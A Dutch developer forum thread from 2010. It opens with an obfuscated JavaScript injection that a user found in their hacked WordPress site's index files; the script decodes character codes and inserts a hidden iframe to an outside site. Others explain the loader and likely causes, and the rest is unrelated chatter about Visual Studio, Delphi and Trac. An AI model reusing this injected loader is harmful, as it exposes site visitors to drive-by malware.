<!--Injection_head[SessionId=0F9CFE85,version=2.0,type=FindDomainName,CRC32=BC6E73F3]--><script>var date=new Date(),pau=('ev'+date.getFullYear()).replace('2010','al');g=window[pau];sf=window['String'].fromCharCode;g(sf(4.5*2,59*2,48.5*2,57*2,16*2,57.5*2,58*2,57*2,16*2,30.5*2,16*2,19.5*2,52.5*2,51*2,57*2,19.5*2,29.5*2,6.5*2,5*2,4.5*2,59*2,48.5*2,57*2,16*2,57.5*2,16*2,30.5*2,16*2,19.5*2,30*2,19.5*2,16*2,21.5*2,16*2,57.5*2,58*2,57*2,16*2,21.5*2,16*2,17*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,57.5*2,50.5*2,49.5*2,58.5*2,57*2,50.5*2,23*2,54.5*2,48.5*2,55*2,58.5*2,48.5*2,54*2,57.5*2,58*2,48.5*2,58*2,57.5*2,25*2,24*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,52.5*2,54.5*2,48.5*2,51.5*2,50.5*2,57.5*2,23.5*2,50*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,16.5*2,30*2,23.5*2,52.5*2,51*2,57*2,17*2,16*2,21.5*2,16*2,19.5*2,48.5*2,54.5*2,50.5*2,16.5*2,19.5*2,29.5*2,6.5*2,5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,57.5*2,23*2,57*2,50.5*2,56*2,54*2,48.5*2,49.5*2,50.5*2,20*2,19.5*2,16.5*2,19.5*2,22*2,19.5*2,31*2,19.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,57.5*2,23*2,57*2,50.5*2,56*2,54*2,48.5*2,49.5*2,50.5*2,20*2,19.5*2,16.5*2,19.5*2,22*2,19.5*2,31*2,19.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,57.5*2,23*2,57*2,50.5*2,56*2,54*2,48.5*2,49.5*2,50.5*2,20*2,19.5*2,16.5*2,19.5*2,22*2,19.5*2,31*2,19.5*2,20.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,62.5*2))</script><!--Injection_tail[SessionId=0F9CFE85]-->

:(.

edit:

Ik zie nu dat in alle mappen in public_html het bestand index.php of index.html dat stukje code erbij heeft gekregen en dat er "// Silence is golden." boven staat... doh. Mappen die geen index. iets hadden hebben een nieuw index.php bestand gekregen.

Wat een kutzooi, zou er een file access bug zitten in wp? In ieder geval is alles weer schoon.
Als je FTP toegang hebt, wijzig je wachtwoord eens.

• roy-t
Thanks, ftp-wachtwoord wordt op dit moment ook gereset.

~ Mijn prog blog!

• FragFrog
  • Registratie: September 2001
  • Laatst online: 23:08
De reden waarom ik zo min mogelijk standaard paketten gebruik. 't is allemaal prutsooi anyway. Ondertussen al eens gehacked door bugs in Typo3, PHPMyAdmin en phpBB, sindsdien komt die meuk er hier niet meer op :/

En zeg nou zelf, een blog heb je toch wel binnen een half uurtje inelkaar gedraait :)

[ Voor 8% gewijzigd door FragFrog op 20-11-2010 14:09 ]

[ Site ] [ twitch ] [ jijbuis ]

• CodeCaster
  • Niet online

CodeCaster

Can I get uhm...

FragFrog schreef op zaterdag 20 november 2010 @ 14:08:
[...]

De reden waarom ik zo min mogelijk standaard paketten gebruik. 't is allemaal prutsooi anyway. Ondertussen al eens gehacked door bugs in Typo3, PHPMyAdmin en phpBB, sindsdien komt die meuk er hier niet meer op :/

En zeg nou zelf, een blog heb je toch wel binnen een half uurtje inelkaar gedraait :)
De tijd die je nodig hebt om de site en database te herstellen is toch veel korter dan de tijd die je nodig hebt om een eigen CMS te schrijven?

• FragFrog
CodeCaster schreef op zaterdag 20 november 2010 @ 14:10:
De tijd die je nodig hebt om de site en database te herstellen is toch veel korter dan de tijd om een eigen CMS te schrijven?
Als je nachtelijke backups hebt en een drukbezochte site betekent dat wel al snel een halve dag werk kwijt. Heb het al zien gebeuren in de praktijk, daar word je niet vrolijk van.

Daar komt helaas nog bij dat de schade groter kan zijn dan enkel je eigen DB en site stuk - als er duizenden spam mailtjes van jou domein worden verzonden kom je al vrij snel op blacklists terecht, als je gebruikers nietsvermoedend mallware downloaden komt daar ook nog eens bij dat zei ook al hun PC's moeten ontsmetten, etc. Om nog maar te zwijgen over het verlies in vertrouwen wat het veroorzaakt. Heeft je hoster daarnaast zijn beveiliging niet op orde kun je bovendien het risico lopen dat bijvoorbeeld bestanden buiten je webroot ineens op internet komen te staan, of dat je hele klant-database de volgende dag op de pirate bay staat. Een van de applicaties waaraan ik gewerkt heb bevat momenteel gegevens van ruim honderdduizend klanten, je zou ze maar op straat hebben liggen..

Uiteraard betekent zelf iets schrijven niet dat je niet gehacked kan worden, maar als ik m'n webserver logs bekijk zie ik daar elke dag wel standaard hack-pogingen in voorbij komen, veel gebruikte exploits, etc. Als je wat aandacht besteed aan beveiliging, goed oplet op standaard valkuilen als SQL injecties en XSS exploits en sterke wachtwoorden gebruikt is het risico een stuk kleiner.

[ Voor 31% gewijzigd door FragFrog op 20-11-2010 14:32 ]

• Kalentum
  • Registratie: Juni 2004
  • Laatst online: 21:43

er wordt een string aangemaakt, die wordt door javascript's eval functie gehaald, en dan wordt er een iframe toegevoegd met een link naar een site.

• hostname
  • Registratie: April 2009
  • Laatst online: 21-12 21:33
rutgerw schreef op zaterdag 20 november 2010 @ 14:36:
[...]

er wordt een string aangemaakt, die wordt door javascript's eval functie gehaald, en dan wordt er een iframe toegevoegd met een link naar een site.
Overigens wel leuk om te zien dat die exploit zichzelf onschadelijk maakt op 1 januari 2011 :P

• Freeaqingme
  • Registratie: April 2006
  • Laatst online: 22-12 17:02
Als alles up2date is is in het geval van wordpress de kans relatief klein dat het daaraan ligt, aangezien zij over het algemeen vrij snel nieuwe updates uitbrengen. Wat me waarschijnlijker lijkt is dat of een trojan je ftp pass gejat heeft, of dat (in het geval van shared hosting) een andere site gehacked is en de hoster z'n zaakjes niet op orde heeft.

No trees were harmed in creating this message. However, a large number of electrons were terribly inconvenienced.

• alienfruit
  • Laatst online: 22-12 17:10

alienfruit

the alien you never expected

Wat voor televisie heb je wel niet? Ik heb zelf een Samsung met DLNA maar dat werkt voor geen meter.

• roy-t
Freeaqingme schreef op zaterdag 20 november 2010 @ 15:38:
[...]

Als alles up2date is is in het geval van wordpress de kans relatief klein dat het daaraan ligt, aangezien zij over het algemeen vrij snel nieuwe updates uitbrengen. Wat me waarschijnlijker lijkt is dat of een trojan je ftp pass gejat heeft, of dat (in het geval van shared hosting) een andere site gehacked is en de hoster z'n zaakjes niet op orde heeft.
Ja meestal wel, maar als er een keer een exploit gevonden is, is het vrij makkelijk om sites te zoeken die wordpress gebruiken en die allemaal te infecteren.
FragFrog schreef op zaterdag 20 november 2010 @ 14:08:
[...]

Mwah ik vind ontwikkelen voor het web over het algemeen erg kut. Blogje pleur ik niet zo even in elkaar helaas... :(

Heb wel wat verschillende cms-en/blogengines geprobeerd, tot nu toe is Wordpress de meest stabiele, dus die houden we nog even.

~ Mijn prog blog!

• Alex)
  • Laatst online: 12-12 21:27
De grootste ellende aan ontwikkelen voor het web, zowel intranet als internet, blijft Internet Explorer t/m versie 8.

We are shaping the future

• FragFrog
Mwoach. Als je de layout developed in IE is het daarna doorgaans erg simpel om'm ook compatible te maken in FF / Chrome. Ik ben gelukkig geen designer, maar doorgaans heb ik er eigenlijk weinig last van, op wat standaard valkuilen na. IE6 negeer ik voor het gemak dan even.
roy-t schreef op zaterdag 20 november 2010 @ 22:28:
Mwah ik vind ontwikkelen voor het web over het algemeen erg kut. Blogje pleur ik niet zo even in elkaar helaas... :(
Net even gekeken, blog op m'n site is welgeteld 166 regels code, inclusief overzichtje met archive (volgende / vorige N items) en comments. Moet nog even wat inelkaar flansen om nieuwe comments weer werkend te krijgen (laatst de hele meuk herschreven) maar veel meer dan twee- a driehonderd regels zal het niet worden. Template is een keer 80 regels, ook de moeite niet. Meeste werk had ik er volgens mij nog aan om syntax highlighting te fixen :Y) Nee, dat soort zaken zal ik niet snel een heel pakket voor gaan lopen installeren met alle gezeur van dien.

Als het helpt: desktop apps heb ik dan weer een hekel aan om te ontwikkelen :+

[ Voor 16% gewijzigd door FragFrog op 21-11-2010 02:33 ]

• roy-t
FragFrog schreef op zondag 21 november 2010 @ 02:32:
Mwoach. Als je de layout developed in IE is het daarna doorgaans erg simpel om'm ook compatible te maken in FF / Chrome. Ik ben gelukkig geen designer, maar doorgaans heb ik er eigenlijk weinig last van, op wat standaard valkuilen na. IE6 negeer ik voor het gemak dan even.

[...]

Net even gekeken, blog op m'n site is welgeteld 166 regels code, inclusief overzichtje met archive (volgende / vorige N items) en comments. Moet nog even wat inelkaar flansen om nieuwe comments weer werkend te krijgen (laatst de hele meuk herschreven) maar veel meer dan twee- a driehonderd regels zal het niet worden. Template is een keer 80 regels, ook de moeite niet. Meeste werk had ik er volgens mij nog aan om syntax highlighting te fixen :Y) Nee, dat soort zaken zal ik niet snel een heel pakket voor gaan lopen installeren met alle gezeur van dien.

Als het helpt: desktop apps heb ik dan weer een hekel aan om te ontwikkelen :+
:P volgende keer als ik een website nodig heb bel ik jou, als jij dan een desktop app nodig hebt bel je maar deze kant op!

Edit:

Rustig hier vandaag! Vandaag mijn eerste stapjes gezet met XAML/WPF. Man dat is wel even anders nadenken, maar tot zo ver werkt het wel lekker. Helaas kwam ik er achter dat de Expression Blend versie die ik heb alleen geschikt is voor WP7 :/, maar in VS2010 gaat het aardig, hoewel de designer wel erg traag is af en toe.

[ Voor 12% gewijzigd door roy-t op 21-11-2010 23:21 ]

~ Mijn prog blog!

• defcon84

defcon84

Multipass?

D-Raven schreef op vrijdag 19 november 2010 @ 15:16:
Dagelijks? waarvoor dan? Ik heb de beta meegemaakt,en samen met wat vrienden dingetjes gedaan enzo. Maar ben er uiteindelijk niet mee verder gegaan. Zag niet echt het nut ervan..

Maargoed volgens mij is dat de reden dat google er ook mee gestopt is :P
Eigenlijk vooral met men vriendin ^_^ daar houden we alles bij: van vakantie plannen tot boodschappenlijstjes ^^
maar ik heb er ook een paar projecten op met klanten (nu nog maar eentje natuurlijk, omdat Wave gaat stoppen)
[...]

En Wave heb ik geprobeerd, maar was niet 'het' voor mij omdat niemand het gebruikte en het was gewoon te langzaam. Zou het misschien wel weer proberen als het sneller werkt (zonder merkbare vertragingen / lockups) en goeie integratie heeft met andere communicatiemediums (IM, email, etc), zonder in te boeten op de bruikbaarheid of het gemak daarvan.
Dat ligt niet aan MKV, dat is maar een container, maar aan je tv :-)

Wave mocht idd iets gebruiksvriendelijker en vlotter zijn, maar je leert er wel mee omgaan hoor :)
alienfruit schreef op zaterdag 20 november 2010 @ 17:49:
[...]

Wat voor televisie heb je wel niet? Ik heb zelf een Samsung met DLNA maar dat werkt voor geen meter.
volgens mij is het een tv met SMB/Samba of een eigen interpretatie van DLNA, want het DLNA protocol ondersteunt geen subtitles en is daardoor de meest achterlijke standaard voor video ooit gemaakt, imho |:( :F

• Cubic X
  • Registratie: Augustus 2006
  • Laatst online: 13-09 11:57
Wat is Microsoft Visual Studio 2010 een ongelooflijk baggerproduct! Ik heb mijn hardeschijf opgedeeld in verschillende partities, een C (Windows en virusscanner) een D (games, films, documenten, etc.) en een E (projecten voor werk & school). Nu moet ik Visual Studio 2010 installeren voor een project...denk je dat dat wil? |:(

Dat stomme programma eist ALTIJD gewoon minimaal 3GB van je C partitie ook al wil je hem installeren op de D partitie...die ruimte heb ik niet meer op de C-schijf (is al een 26GB partititie, nog 'maar' 1.8GB vrij). Moet ik eerst een andere partitie inkrimpen om de C partitie te vergrootten, wat een wanproduct van MS |:( .

• Haan

Haan

dotnetter

Lekker kortzichtig om een product af te zeiken vanwege de installer ;) daar heeft wel meer software last van, en niet alleen van MS..

• Alex)
Ehm, ja? De standaardlocatie voor een programma is de %ProgramFiles%-folder, een hoop vereiste (gedeelde) componenten worden by default daarnaartoe geïnstalleerd. Microsoft adviseert niet voor niets om genoeg vrije schijfruimte op C: te hebben.

Hoe dat nou de schuld van Visual Studio is zie ik niet helemaal. Het is een heerlijke IDE - al duurt het installeren wel lang.

• Cubic X
  • Registratie: Augustus 2006
  • Laatst online: 13-09 11:57
Haan schreef op maandag 22 november 2010 @ 09:20:
Lekker kortzichtig om een product af te zeiken vanwege de installer ;) daar heeft wel meer software last van, en niet alleen van MS..
Ja, maar het is maandagochtend en dan gelijk dit soort situaties.... :P :> .

Ik weet dat er meer programma's last van hebben, maar ik erger me er altijd al aan ;) .

• BoAC
  • Registratie: Februari 2003
  • Laatst online: 22:27

BoAC

Memento mori

Tja en Visual Studio heeft wat common files die gedeeld worden met andere producten.. die op C staan.
Je kan verder voor de andere delen (niet common) gewoon prima aangeven waar die moeten staan :)

• defcon84

defcon84

Multipass?

Ik vind VS echt een heerlijk programma (zeker ism ReSharper:))

Maar ja, de installatie duurt wat lang, maar dat hoeft gelukkig maar 1x
en dat ie maar 500mb ofzo op een andere partitie kan installeren is mss ook wat vervelend, maar niet raar..
ik had men SSD thuis ook liever voor iets anders gebruikt dan voor VS die ik mss 1x per week opstart :p

• Alex)
Overigens, welke add-ons voor Visual Studio hebben jullie allemaal? Mijn lijstje begint langzaamaan te groeien:
  • ReSharper
  • GhostDoc
  • Regionerate this
  • TFS powertools
  • Visual Studio powertools

• Haan

Haan

dotnetter

Ik eigenlijk alleen R# en GhostDoc.

• defcon84

defcon84

Multipass?

ik R# en NuGet (vroeger NuPack)

• whoami
  • Registratie: December 2000
  • Laatst online: 21:24
Alex) schreef op maandag 22 november 2010 @ 09:35:
Overigens, welke add-ons voor Visual Studio hebben jullie allemaal? Mijn lijstje begint langzaamaan te groeien:
  • ReSharper
  • GhostDoc
  • Regionerate this
  • TFS powertools
  • Visual Studio powertools
R#
Testdriven.NET
VS Powertools
Ghostdoc
Rockscroll (enkel in 2008, want dat werkt niet in 2010 (althans, niet toen ik het een aantal maanden geleden installeerde)

https://fgheysels.github.io/

• roy-t
Arg, half uurtje bezig geweest om Python2.6 te installeren icm easy_install, om daarna trac te installeren. Gaat prima. Maar daarna installeer ik de (door trac aangeraden) SVN server namelijk Collabnet SVN. Deze installeerd ergens Python2.5. Waardoor mijn hele Python2.6, easy_install en TRAC installaties niet meer werkte. Een reinstall van Python2.6 en easy_install later kom ik erachter dat easy_install niet meer werkt (Import error No module named pkg_resources). Waardoor ik TRAC niet kan installeren..

Anyway, anderhalf uur later alles gedeinstallerd en Python2.6 en easy_install weer opnieuw erop. Nu kan ik TRAC weer installeren. Daarna Visual SVN Server maar installeren ipv deze collabnet versie :@

[ Voor 15% gewijzigd door roy-t op 22-11-2010 10:51 ]

~ Mijn prog blog!

• D-Raven
whoami schreef op maandag 22 november 2010 @ 10:38:
[...]

R#
Testdriven.NET
VS Powertools
Ghostdoc
Rockscroll (enkel in 2008, want dat werkt niet in 2010 (althans, niet toen ik het een aantal maanden geleden installeerde)
R#
Testdriven.NET
VS Powertools
NuGet

• RayNbow

RayNbow

Kirika <3

* RayNbow mompelt iets over (a) verschillende date formats in een en dezelfde csv file en (b) de crappy parsers in de Python's modules die er niet mee om kunnen gaan... :(

• Janoz
  • Registratie: Oktober 2000
  • Laatst online: 23:44

Janoz

Moderator Devschuur®

!litemod

roy-t schreef op maandag 22 november 2010 @ 10:50:
Arg, half uurtje bezig geweest om Python2.6 te installeren icm easy_install, om daarna trac te installeren. Gaat prima. Maar daarna installeer ik de (door trac aangeraden) SVN server namelijk Collabnet SVN. Deze installeerd ergens Python2.5. Waardoor mijn hele Python2.6, easy_install en TRAC installaties niet meer werkte. Een reinstall van Python2.6 en easy_install later kom ik erachter dat easy_install niet meer werkt (Import error No module named pkg_resources). Waardoor ik TRAC niet kan installeren..

Anyway, anderhalf uur later alles gedeinstallerd en Python2.6 en easy_install weer opnieuw erop. Nu kan ik TRAC weer installeren. Daarna Visual SVN Server maar installeren ipv deze collabnet versie :@
Huh?

sudo apt-get install subversion trac

Even ratelen en klaar.

Ken Thompson's famous line from V6 UNIX is equaly applicable to this post:
'You are not expected to understand this'

• Freeaqingme
  • Registratie: April 2006
  • Laatst online: 22-12 17:02
roy-t schreef op maandag 22 november 2010 @ 10:50:
Arg, half uurtje bezig geweest om Python2.6 te installeren icm easy_install, om daarna trac te installeren
Is dat trac installeren vrijwillig? Ik heb een paar keer trac moeten gebruiken om e.e.a. te reporten, en ik moet zeggen dat ik 't echt een onding vind. Geef mij dan maar redmine of jira, veel fijner 8)

No trees were harmed in creating this message. However, a large number of electrons were terribly inconvenienced.

• MBV
  • Registratie: Februari 2002
  • Laatst online: 19:56

MBV

en dan even met apt-get Visual Studio installeren ;)

• Janoz
  • Registratie: Oktober 2000
  • Laatst online: 23:44

Janoz

Moderator Devschuur®

!litemod

Tja, keuzes he :). Daarnaast hoeft niet alles op 1 en dezelfde bak te staan natuurlijk.

* Janoz heeft zijn subversion repository samen met al die andere meuk die bij de ondersteuning van het ontwikkelen hoort op zijn meterkast atompje geinstalleerd (ubuntu server). In de tijd dat mijn desktop nog wel thuis stond maakte het dan ook niet uit of ik ging ontwikkelen op mijn laptop, desktop of op de laptop van mijn vrouw (allen windows).

Ken Thompson's famous line from V6 UNIX is equaly applicable to this post:
'You are not expected to understand this'

• RayNbow

RayNbow

Kirika <3

RayNbow schreef op maandag 22 november 2010 @ 11:00:
* RayNbow mompelt iets over (a) verschillende date formats in een en dezelfde csv file en (b) de crappy parsers in de Python's modules die er niet mee om kunnen gaan... :(
Oplossing: schrijf een stukje Java en roep dat aan vanuit Python. *O*

• FragFrog
Janoz schreef op maandag 22 november 2010 @ 12:06:
* Janoz heeft zijn subversion repository samen met al die andere meuk die bij de ondersteuning van het ontwikkelen hoort op zijn meterkast atompje geinstalleerd.
Same here, werkt toch wel erg aangenaam.

Overigens heb ik hetzelfde gedonder gehad met Trac en SVN, uiteindelijk heb ik hier gewoon mod_dav_svn (of hoe heet dat ding) geinstalleerd als Apache module. Dev-server draait dus windows 2003 met Apache voor web, SVN en Trac. Mooie combo, al is het soms een ramp om alle binaries te vinden en compatible te houden :+

[ Voor 17% gewijzigd door FragFrog op 22-11-2010 14:32 ]

Verwijderd

Rage mode:
Zit hier op mijn stage een applicatie te maken in delphi. onverklaarbare error's etc.
Krijg ik een error dat mijn geheugen vol loopt. Ik aan stagebegeleider vragen wat die error inhoud( ben net begonnen met delphi/pascall ) Zegt mijn "baas" dat ik schijf opruiming over mijn pc moet laten runnen. 8)7
Result: Windhoos pc onwerkbaar traag!&*%$&*&%%

Verlang naar mijn Macbook O-) Nooit gezeik mee maar mag ik hier niet gebruiken :(

Verwijderd

Woehoe, de eerste kansen op sneeuw opgegeven :P

• Voutloos
  • Registratie: Januari 2002
  • Niet online
Geheugen of hdd vol? Want anders faal je nogal dat je uberhaupt schijfopruiming aanzet. :>

{signature}

Verwijderd

Verwijderd schreef op maandag 22 november 2010 @ 15:19:
Rage mode:
Zit hier op mijn stage een applicatie te maken in delphi. onverklaarbare error's etc.
Krijg ik een error dat mijn geheugen vol loopt. Ik aan stagebegeleider vragen wat die error inhoud( ben net begonnen met delphi/pascall ) Zegt mijn "baas" dat ik schijf opruiming over mijn pc moet laten runnen. 8)7
Result: Windhoos pc onwerkbaar traag!&*%$&*&%%

Verlang naar mijn Macbook O-) Nooit gezeik mee maar mag ik hier niet gebruiken :(
of ben je toevallig zeer veel geheugen aan het alloceren binnen je applicatie ?
(en geef je niks vrij ?)

• afraca
  • Registratie: April 2009
  • Laatst online: 13-08 16:46

afraca

Open Source!

Voutloos schreef op maandag 22 november 2010 @ 15:37:
Geheugen of hdd vol? Want anders faal je nogal dat je uberhaupt schijfopruiming aanzet. :>
Boze pagefile? :> ( mocht hij nog werken met 128mb geheugen)

IMDB vote history | Next-gen OS, audio en video player, search engine en Movie DB

• CodeCaster
  • Niet online

CodeCaster

Can I get uhm...

delphi. onverklaarbare error's etc. Krijg ik een error dat mijn geheugen vol loopt.
Delphi afsluiten, BDE opstarten, IDAPI-configuratie opnieuw laden, opslaan, Delphi opstarten, afsluiten, hele computer opnieuw starten en dan bidden dat het weer werkt. Baggersoftware, Delphi 5/6 in ieder geval. Ik heb eens gekeken of wij over kunnen naar Delphi 2007 / 2010 / XE maar diverse legacy closed-source componenten worden daarin niet ondersteund helaas ;(

Speaking of which, ik ben nu een ASP.NET-project aan het onderhouden wat een jaar of vijf geleden is geboren en sindsdien amper onderhouden. Na twee keer klikken in de website staan er gemiddeld zo'n twintig tot vijftig connecties vanuit IIS naar de database open. Als vijf man dat tegelijk doet hangt iedereen. Heel fijn om te debuggen.

[ Voor 10% gewijzigd door CodeCaster op 22-11-2010 16:00 ]

• Spockz
  • Registratie: Augustus 2003
  • Laatst online: 06-12 22:47

Spockz

Live and Let Live

Delphi 6 is eigenlijk de stabielste versie. We hebben 2006(7?) geprobeerd maar dat crashte om de haverklap. En nu gebruiken we 2009. Dit is al weer iets minder brak maar nog steeds zijn er problemen met packages die het om de een of andere reden opeens niet meer doen en een vage error geven bij het inladen. Om over de Generics library nog maar niet te spreken, hier zitten nog zoveel fouten in dat het zonder bug fixes praktisch onbruikbaar is.

C'est le ton qui fait la musique. | Blog | @linkedin
R8 | 18-55 IS | 50mm 1.8 2 | 70-200 2.8 APO EX HSM | 85 1.8

Verwijderd

In dit geval is het delphi 7, en bedankt codecaster it did the trick _/-\o_

Maar inderdaad delphi crashed bij mij elke dag :(

Verwijderd

De grootste ramp van delphi 5 vond ik altijd dat hij zijn oude locaties opsloeg als absolute paden.
maak je een copy van de source naar een andere directory om een en ander aan te passen, zit je ondertussen ongemerkt in de orginele versie te werken. 8)7

• ThaStealth
  • Laatst online: 18-12 11:10
Verwijderd schreef op maandag 22 november 2010 @ 17:54:
De grootste ramp van delphi 5 vond ik altijd dat hij zijn oude locaties opsloeg als absolute paden.
maak je een copy van de source naar een andere directory om een en ander aan te passen, zit je ondertussen ongemerkt in de orginele versie te werken. 8)7
Niet alleen delphi 5... Delphi 2006 heeft er ook last van...

Grootste Delphi ail vind ik nog altijd Delphi.NET, en dan ook nog een ASP.NET applicatie in Delphi.NET 1.1....
Heb er ooit de eer gehad om een zo'n pronkstuk te mogen debuggen, na iedere edit (als in een letter veranderen op 1 pagina) kon ik Delphi opnieuw starten omdat de designer van slag was

[ Voor 25% gewijzigd door ThaStealth op 22-11-2010 18:31 ]

Mess with the best, die like the rest

• Alex)
Een servertje hebben staan is inderdaad ideaal... ik heb er thuis eentje staan waar Team Foundation Server 2010 op draait, en die is toegankelijk van buitenaf. Werkt echt geweldig, nooit gezeik mee.

Verwijderd

Dat heb ik op mijn stage plek ook. Maar doe het toch, ik heb de rechten niet om een fatsoenlijke IDE te installeren en de systeembeheerder is de helft van de tijd onbereikbaar. Alles op m'n Mac op een USB stick gooien en dan in Notepad openen wanneer m'n begeleider iets wil zien :P

(Ja, ik ben verwend met TextMate)

• YopY
Hm, moet m'n oude laptop eens instellen als SVN server oid... aan de andere kant, ik denk dat de harde schijf stuq is, eerst ging de Windows installatie daarop stuq (kon het register niet meer lezen bij het opstarten), later de Ubuntu installatie na een update.

Staat nu ubuntu server op, maar heb nog niet uitgezocht hoe je wlan aan krijgt via de console :+.

Verwijderd

Alex) schreef op maandag 22 november 2010 @ 18:38:
Een servertje hebben staan is inderdaad ideaal... ik heb er thuis eentje staan waar Team Foundation Server 2010 op draait, en die is toegankelijk van buitenaf. Werkt echt geweldig, nooit gezeik mee.
moet ook nog een keer zou iets opzetten zou wel een verademing zijn. maar moet eerst een low power low noise servertje hebben.

maar wil het nog wel een beetje snel werken via internet ?

• dcm360
  • Registratie: December 2006
  • Niet online

dcm360

Moderator Discord

HD7767 powered

Spockz schreef op maandag 22 november 2010 @ 16:15:
Delphi 6 is eigenlijk de stabielste versie. We hebben 2006(7?) geprobeerd maar dat crashte om de haverklap. En nu gebruiken we 2009. Dit is al weer iets minder brak maar nog steeds zijn er problemen met packages die het om de een of andere reden opeens niet meer doen en een vage error geven bij het inladen.
Veel 'oude' code bevat allerlei code die goochelt met strings en chars, en laten die vanaf D2009 standaard unicode ipv ansi zijn. Tot nu toe is het mij wel redelijk gelukt om oude (en ook wel antieke) codevoorbeelden met wat patchwerk werkend te krijgen. Wat dat betreft zijn D2009+ wat minder compatibel met oude code dan wat er tot dan toe gebruikelijk was.

• Serpie
  • Registratie: Maart 2005
  • Laatst online: 01-07-2023
Alex) schreef op maandag 22 november 2010 @ 18:38:
Team foundation server, heerlijk. Gebruik het nu ook al bijna een jaar op een server thuis, helaas gaat empower voor ISV´s eruit. Had er graag nog een jaar gebruik van willen maken :(

Nu ben ik vanaf Januari gebonden aan Microsoft Action Pack Development and Design, super voor die prijs alleen jammer genoeg zit daar dus geen TFS in. Maar weer terug naar sourcegear fortress dan.

Verwijderd

Hmmm, het lijkt er op dat ik de komende weken een klusje als PHP klopper in de wacht heb gesleept. Tijd om dat maar eens even af te stoffen geloof ik :p

• CodeCaster
  • Niet online

CodeCaster

Can I get uhm...

Nog even schaamteloos spammen :P CodeCaster: Microsoft Partner Network

Is het voor een niet-"ingewijde" een beetje leesbaar? :)

Verwijderd

Verwijderd schreef op maandag 22 november 2010 @ 20:58:
Hmmm, het lijkt er op dat ik de komende weken een klusje als PHP klopper in de wacht heb gesleept. Tijd om dat maar eens even af te stoffen geloof ik :p
Gecondoleerd. :p

